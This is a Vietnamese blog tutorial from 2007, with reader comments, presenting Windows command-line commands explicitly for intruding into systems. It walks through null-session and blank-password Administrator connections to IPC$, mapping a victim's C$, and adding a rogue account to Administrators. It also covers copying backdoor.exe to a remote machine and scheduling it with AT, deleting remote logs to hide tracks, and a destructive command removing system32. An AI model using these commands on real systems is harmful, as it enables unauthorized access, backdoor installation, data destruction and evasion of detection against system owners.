26 thg 5, 2007

Những lệnh cần thiết cho việc thâm nhập hệ thống (Windows) Phần I: Lệnh NET

Ở đây trong phạm vi bài viết tôi chỉ giới thiệu vài cú pháp của từng lệnh một cách ngắn gọn và thực tiển, còn bạn muốn tìm hiểu sâu hơn chỉ việc gõ ==> “tên lệnh cần tìm hiểu” /help (vd: để biết sâu về lệnh net view bạn gõ ==> net view /help), và tôi cũng không đi sâu về công việc thâm nhập. Bài viết này giống như là một bài tổng hợp các lệnh cần thiết mà thôi vì đôi khi nếu lâu ngày không sử dụng đến thì bạn vẫn có thể quên nó như thường.

Chương I: Lệnh NET

Lệnh NET là một lệnh ngoại trú (tức là không có sẵn) nhưng nó luôn được đi kèm với hầu hết các hệ điều hành Windows của Microsoft và nó là một lệnh rất cần thiết và quang trọng dùng để xâm nhập một hệ thống lệnh NET không đi một mình mà nó đi chung với những phương thức khác để kết hợp thành một tổ hợp cụ thể. Chính vì tầm quang trọng của nó nên tôi tách hẳn nó ra thành một chương riêng biệt

1/ NET VIEW: Lệnh này dùng để xem danh sách các tài nguyên đang được chia sẽ của một máy bất kỳ nếu không có bất cứ tham số nào có nghĩa là nó sẽ hiển thị tài nguyên của máy cục bộ (local)

Cú pháp:
NET VIEW \\computername
or
NET VIEW \\ip
(dùng cho máy trên mạng hoặc tên hoặc địa chỉ IP)

Ví dụ:
NET VIEW \\127.0.0.1

2/ NET USE: Lệnh này dùng để kết nối máy của người đang thực hiện tới một tài nguyên được chia sẽ trên hệ thống mạng (có thể hiểu hệ thống mạng ở đây có thể là các máy tính trong mạng cục bộ hoặc qua địa chỉ IP cố định) với một quyền hạn nhất định. Lưu ý ở đây là lệnh này chỉ có tác dụng khi bạn có quyền hạn người sử dụng nhất định trên một tài nguyên nhất định trên mỗi máy cần truy cập mà thôi (đó là trường hợp bạn biết được username và password trên máy muốn kết nối tài nguyên còn trường hợp như bạn không biết được thì có một cách là kết nối một null session đến máy cần kết nối) cũng có một cách khác là đoán và “bruce force password” hoặc sử dụng tools nhưng trong phạm vi bài viết này tôi không đề cập đến.

Cú pháp:
NET USE \\IP\SHARENAME “PASSWORD” /USER:”USERNAME”
(Dùng kết nối tới một tài nguyên nhất định khi biết username và password)
NET USE \\IP\IPC$ “” /USER:”Administrator”
(trường hợp password của Admin không thiết lập)
NET USE \\IP\IPC$
(kết nối một null session tới tài nguyên mặt định ==> xác xuất thành công rất thấp)
NET USE ….. /DELETE
(sẽ ngắt kết nối từ máy người sử dụng tới máy chứa tài nguyên)

Ví dụ: như bạn đang ở máy A bạn muốn kết nối tài nguyên của máy B có địa chỉ IP là 120.1.1.5 trong khi đó máy B có 2 tài nguyên được chia sẽ là (data1 và data2 và data1 dành cho “user1″ với password là “pass1″ và “data2″ dành cho user2 với password là “pass2″ còn một trường hợp nữa là tài nguyên mặt định của máy B là IPC$ và thường là dành cho quyền cao nhất là admin và nếu không may tài khoản administrator không có password bảo vệ thì coi như khi bạn kết nối tới tài nguyên IPC$ thì bạn hoàn toàn có thể truy cập vào mọi tài nguyên được chia sẽ mặt định và không mặt định trên máy B)

-Để kết nối tới data1 và gán tài nguyên đó cho ổ đĩa x: ==> NET USE x: \\120.1.1.5\data1 “pass1″ /USER:”user1″

-Để kết nối tới tài nguyên mặt định trong trường hợp admin không thiết lập password:

Bước 1 ==> NET USE \\120.1.1.5\IPC$ “” /USER:”administrator” (khi kết nối này thành công thì mới thực hiện tiếp)

Bước 1′ ==> NET USE \\120.1.1.5\IPC$ (kết nối tới một null session)

Bước 2 ==> NET USE z: \\120.1.1.5\data2 (gán data2 cho ổ đĩa z: để truy :cập để tiện sử dụng, bạn nên lưu ý ở đây tôi không cần phải thêm password và username như ví dụ trước vì đã kết nối tới IPC$ thành công thì không cần)

Bước 2′ ==> NET USE y: \\120.1.1.5\C$ (truy cập tới ổ đĩa c: của victim thường là chia sẽ mặt định và gán cho ổ y: máy local từ đó bạn có thể copy bất cứ thứ gì bạn muốn vào máy victim)

Ghi chú: Nếu như kết nối tại bước 1 hay bước 1′ thành công thì bạn có thể thao tác các câu lệnh khác trên máy victim mà không gặp bất cứ khó khăn gì vì đó chính là chìa khóa của cánh cửa. Nếu sử dụng lệnh NET USE thành công thì coi như bạn đã nắm trong tay bất cứ máy nào.

3/ NET USER: Tạo/Xóa tài khoản người dùng (có thể tra cứu thêm bằng /HELP), hoặc hiện danh sách tài khoản nếu không có tham số.

Cú pháp:
NET USER “username” “password” /ADD
(tạo người dùng có tên là username và password)
NET USER “username” /DELETE
(xóa người dùng có tên là username)

Ví dụ:
NET USER L0ng3ta passw /ADD
(thêm một user có tên là “L0ng3ta” và mật khẩu là “passw” vào hệ thống không nhất thiết phải có dâu “” trừ những trường hợp có ký tự đặc biệt)
NET USER L0ng3ta /DELETE
(xóa người dùng có tên là “L0ng3ta”)

4/ NET GROUP: Thêm/Xóa người dùng ở một group, hiển thị các group (nếu không có tham số)

Cú pháp:
NET GROUP “groupname” “username” /ADD
(thêm người dùng có tên username vào group có tên groupname)
NET LOCALGROUP “groupname” “username” /ADD
(thêm người dùng có tên username vào localgroup có tên groupname)
NET GROUP “groupname” “username” /DELETE
(thêm người dùng có tên username vào group có tên groupname)
NET LOCALGROUP “groupname” “username” /DELETE
(xóa người dùng có tên username khỏi localgroup có tên groupname)

Ví dụ:
NET GROUP “Administrators” “L0ng3ta” /ADD
(Thêm user L0ng3ta vào group admin)

5/ NET START/STOP “tên dịch vụ”: lệnh này dùng để khởi tạo hoặc tắt một dịch vụ (Service) của hệ thống window (thường sử dụng trên local)

ví dụ:
NET START|STOP “Task Scheduler” (khởi động/tắt dịch vụ Task Scheduler của hệ thống xem thêm lệnh SC)

6/ NET TIME: xem giờ của máy trên hệ thống mạng

Cú pháp:
NET TIME \\IP
(xem giờ của máy có địa chỉ IP xác định)

ví dụ:
NET TIME \\120.1.1.5

7/ NET SHARE: dùng để chia sẽ tài nguyên (thường dùng trên local)

Cú pháp:
NET SHARE sharename=path
(path ở đây có thể là một ổ đĩa hoặc đường dẫn tuyệt đối tới một thư mục hoặc máy in .v.v.)

ví dụ:
NET SHARE DATA=C:\ /UNLIMITED
(Chia sẽ ổ đĩa c: lấy tên là ổ data với quyền truy cập không giới hạn)


---
muốn xem địa chỉ ip của trang wed thì dùng lệnh gì?

để biết chính xác thì còn nhiều vấn đề nữa. Cách đơn giản nhất là bạn sử dụng lệnh “ping”
ví dụ: ping www.vnn.vn
---
muốn biết ip của mình trên net?

dùng lệnh “ipconfig /all”

hoặc sử dụng các website này
http://www.ip2location.com/
hoặc
http://whatismyipaddress.com/

Muốn thấy cả bản đồ từ vệ tinh thì vào đây
http://www.ip-adress.com/
gõ Ip của các bạn vào và nhấn vào “Big IP satellite picture (click here)”

Bổ sung:

Trang này tôi mới viết sử dụng cơ sở dữ liệu của ip-to-country.com để xác định một địa chỉ IP thuộc quốc gia nào … cũng khá thú vị.

http://sgstars.tripod.com/cgi-bin/ip2local.pl?203.162.0.1
(nhớ sửa lại Ip bạn muốn biết)
Phiên bản sau sẽ nâng cấp tự nhận biết IP của bạn và quốc gia
-------
làm sao mình có thể biết được ip cua người đàn chat với mình bằng YM vậy?
Bạn hãy vào google gõ key: “Tìm” + “IP” + “YM” sẽ cho bạn hằng đống kết quả.

--------------

Những lệnh cần thiết dùng trong thâm nhập (Window) phần II

Đâu phải lúc nào bạn cũng dễ dàng thực hiện các thao tác thông giao diện bằng graphic trên máy cần thao tác (ví dụ như những khi bạn đang làm chuyện mờ ám thì làm gì có cái Window Explorer chằng hạn để cho bạn sử dụng và thao tác trên các tập tin) vì thế những lệnh sau tuy đơn giản nhưng cũng khá là quang trọng trong thao tác của bạn, nếu như bạn muốn thâm nhập một máy nào đó chẳng hạn mà bạn coi như không thuộc nằm lòng các lệnh dưới đây thì tôi khuyên bạn hãy bỏ ý định đó đi.

1/Lệnh COPY: lệnh này là lệnh nội trú dùng để sao chép các tập tin (khi bạn xâm nhập vào được rồi thì dĩ nhiên phải để lại cái gì đó thì bạn dùng lệnh này)

Cú pháp:
COPY path1\filename1 path2
(chép tập tin filename1 ở đường dẫn path1 sang đường dẫn path2)
+Chú ý: ở đây tôi dùng định nghĩa đường dẫn tức là có thể gồm một ổ đĩa, một thư mục hay cả một địa chỉ tài nguyên mạng (với điều kiện bạn đã kết nối tới)

Ví dụ:
==>COPY c:\abc.txt d:\
(chép tập tin có tên là abc.txt từ ổ c: sang ổ đĩa d:)
==>COPY c:\backdoor.exe \\203.162.45.2\c$
(chép file backdoor từ ổ đĩa C máy của bạn sang ổ đĩa C của địa chỉ IP 203.162.45.2)
Lưu ý: tên tập tin bạn có thể sử dụng những ký tự đại diện như * hoặc ?
==>Copy c:\*.doc d:\ (chép tất cả các tệp có đuôi .doc sang ổ d:)

2/Lệnh DEL: lệnh này là lệnh nội trú dùng để xóa tập tin (dùng để xóa bỏ dấu chân người lính ;) )

Cú pháp:
DEL path\filename
(xóa file có tên là filename ở tại đường dẫn path)
Ví dụ:
==>DEL c:\windows\*.log
(xóa tất cả tệp tin .log tại ổ đĩa C: và trong thư mục windows)
Mở rộng: DEL \\203.162.45.2\Admin$\*.log

3/Lệnh MD: lệnh này là lệnh nội trú dùng để tạo một thư mục

Cú pháp:
MD path\tenthumuc

Ví dụ:
==>MD c:\windows\temp1
(tạo thư mục temp1 trong thư mục windows của ổ c:)
Mở rộng:
==>MD \\203.162.45.2\Admin$\temp1

4/Lệnh RD hay RMDIR (xóa thư mục)

Cú pháp:
RD /S /Q path\tenthumuc
(với tham số /S thì sẽ xóa tất cả các file và thư mục con nằm trong thư mục cần xóa và tham số /Q là xóa không cần hỏi)

Ví dụ:
==>RD /S /Q c:\windows\system32
(xóa thư mục system32 và tất cả những gì nằm trong system32)

5/Lệnh AT: hẹn giờ cho một chương trình tự kích hoạt (có thể gõ AT /HELP để biết thêm)

Cú pháp:
AT \\IP time /INTERACTIVE “command”

Ví dụ:
==>AT \\203.162.45.2 2:30AM /INTERACTIVE “c:\backdoor.exe”
Hẹn giờ đúng 2:30 thì máy có địa chỉ IP là \\203.162.45.2 sẽ kích hoạt chương trình backdoor.exe trong ổ C:

Lưu ý: lệnh AT chỉ có tác dụng khi service task schedule đã được bật lên. (xem thêm lệnh NET START (trong phần 1) hoặc lệnh SC bên dưới để biết cách bật một service) và muốn chương trình kích hoạt ngay mà không phải đợi thì bạn phải kiểm tra giờ hệ thống tại địa chỉ IP xác định bằng lệnh NET TIME (trong phần 1) và bảo đảm rằng giờ bạn hẹn cho chương trình kích hoạt phải lớn hơn giờ hệ thống ít nhất là 1 phút.

6/Lệnh SC: chạy hoặt tắt một service trên máy xác định

Cú pháp:
SC \\IP start/stop/pause… service

Ví dụ:
==>SC \\203.162.45.2 start Schedule
(chạy service Schedule trên máy có IP 203.162.45.2)

7/Lệnh START: kích hoạt một chương trình tại máy local

Cú pháp:
START “tên chương trình”

Ví dụ: (chạy chương trình notepad từ command line)
==>START notepad
hoặc
==>START notepad.exe

8/Lệnh TASKLIST (xem danh sách và ID các chương trình chạy trong process).
Để tìm hiểu thêm bằng cách gõ TASKLIST /?

9/Lệnh TASKKILL (hủy một process xem thêm bằng cách TASKKILL /?)

Cú pháp:
TASKKILL /PID ID
(hủy chương trình đang chạy theo ID)
hoặc
TASKKILL /F /IM “tên chương trình”
(hủy chương trình có tên đang chạy trong process)

Ví dụ chương trình notepad.exe khi chạy lệnh TASKLIST có ID là 644 thì khi muốn hủy ta gõ lệnh:
==>TASKKILL /PID 644
hoặc
==>TASKKILL /F /IM notepad.exe

10/Lệnh REG: (tạo, xóa, khôi phục, xem… các giá trị của registry trên máy local hoặc mát mạng)

Cú pháp:
Reg Operation
Trong đó Operation bao gồm các thao tác như Add, Query, Delete, Copy, Save, Load, Unload, Restore, …. để biết thêm chi tiết các bạn gõ Reg Add /?)

Ví dụ: mở khóa cho registry edit cho máy tính có tên là ABC bạn bạn gõ như sau:

REG add \\ABC\HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 0 /f

Đó là những lệnh hết sức cơ bản mà các bạn cần phải nắm rõ nếu như muốn đi bước đầu về lĩnh vực thâm nhập. Nhưng các lệnh này không phải là tất cả vì còn nhiều nhiều lệnh và chương trình khác nữa nhưng đó là những lệnh thiết yếu nhất. Chẳng qua bài viết này chỉ nhằm mục đích thống kê vì đôi khi lâu ngày ta không sử dụng đến rồi cũng quên. Hy vọng bài viết giúp ích cho các bạn và giúp các bạn cũng cố một lại số kiến thức cơ bản.

HẾT
L0ng3ta.

2 nhận xét:

MCSE nói...

thông tin bài tốt đẹp
cảm ơn MCSE

MCSE nói...

Cảm ơn bạn đã chia sẻ thông tin này với chúng tôi.
đẹp đăng bài!
MCSE